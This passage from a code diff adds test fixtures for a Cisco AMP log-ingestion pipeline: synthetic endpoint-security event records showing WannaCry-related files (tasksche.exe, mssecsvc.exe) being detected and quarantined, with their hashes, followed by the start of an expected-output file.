pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":3200,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":235000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2708,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":172000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":33000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":891000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":876000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":845000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":798000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":767000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":751000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":735000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} \ No newline at end of file diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp4.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp4.ndjson.log-expected.json new file mode 100644 index 00000000000..26bab6555f6 --- /dev/null +++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp4.ndjson.log-expected.json 
@@ -0,0 +1,8107 @@ +{ + "expected": [ + { + "@timestamp": "2021-01-14T21:17:16.000Z", + "file": { + "name": "resume.exe", + "path": "\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe", + "hash": { + "sha1": "5ca4bef8de6def53519d4b22632675bb4c1e470b", + "sha256": "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "md5": "41476df3138717868118d8542cf3d1d6" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP" + ], + "hash": [ + "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "41476df3138717868118d8542cf3d1d6", + "5ca4bef8de6def53519d4b22632675bb4c1e470b" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_AMP", + "hostname": "Demo_AMP" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:29.843493642Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6508397899087348000,\"timestamp\":1610659036,\"timestamp_nanoseconds\":295927133,\"date\":\"2021-01-14T21:17:16+00:00\",\"event_type\":\"Retrospective 
